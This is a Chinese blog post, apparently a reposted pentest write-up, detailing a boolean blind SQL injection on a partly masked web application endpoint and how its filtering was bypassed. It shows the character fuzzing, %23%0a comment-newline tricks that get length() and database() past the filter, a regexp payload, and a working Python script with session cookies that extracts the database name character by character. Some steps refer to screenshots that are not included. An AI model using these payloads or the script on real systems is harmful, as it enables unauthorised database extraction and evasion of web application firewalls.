您好,登錄后才能下訂單哦!
這篇文章給大家介紹如何解析SQL的bypass案例分析,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。
一、測試發現一個布爾型注入點,測試過程如下:
1、原始請求
3、輸入’or’1’like’2
4、初步判斷存在布爾型sql盲注,然后開始判斷庫名長度:
5、首先想到可能處理了空格,手工簡單測試下:
6、發現:
空格or(不攔截)
or空格(攔截)
or/**/(攔截)
or%09 %0a %0b %0c %0d(不攔截)
二、簡單fuzz下字符:
1、or (偶數個~) 也可以bypass
2、奇數個~執行失敗:
3、進一步獲取庫名長度:
4、還是被攔截,猜測是處理了length()或database()函數,簡單嘗試下:
5、length()被處理掉了,fuzz一下:
6、利用注釋換行符組合如length%23%0a()即可繞過:
7、這里還是報錯,簡單測試了下,把空格鍵換一下即可解決:
8、繼續判斷庫名長度:
9、database()也被處理掉了,同樣的方法可繞過:
10、最終得出數據庫長度為7,如下圖:
11、獲取庫名
12、substr未攔截,借助intruder跑一下:
注出第一個字符為l
三、寫個腳本拖一下完整庫名:
import requests
payloads = 'abcdefghijklmnopqrstuvwxyz_-'
database = ''
for l in range(1,8):
for payload in payloads:
burp0_url = "https://xxxxxx.xxxxxxxx.com:443/dms.web/manage/rest/basedata/DutyRecord?sort=EMPLOYEE_NO&order=asc&limit=10&offset=0®isterDate=2020-08-19'or%09substr(database%23%0a(),{0},1)%3d'{1}'%09or'1'like'2&employeeNo=0222&onDutyTime=08%3A00&offDutyTime=17%3A00&usableWorkingHours=9.0&dms_table=%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D&dmsFuncId=15100070&_=1597802235462".format(l,payload)
burp0_cookies = {"JSESSIONID": "ABCWB37FFE3DB54BD5705453E681E41F2", "selectDealerCode": "xxxx", "selectusername": "xxxx", "language": "zh_CN"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:79.0) Gecko/20100101 Firefox/79.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest", "Connection": "close", "Referer": "https://xxxxxx.yxxxxuxuxo.xxm/dms.web/html/index.html"}
resp = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
if "2018-10-22" in resp.content:
database += payload
print '[*]success\t' + database
else:
print '[*]dumping......'
print '[*]current database is:\t' + database
借助regexp正則匹配也可以實現,payload:
'%20or%0adatabase%23%0a()regexp'%5el'%09or%09'2'like'1
成功注出第一個字符:l,以此類推。
關于如何解析SQL的bypass案例分析就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。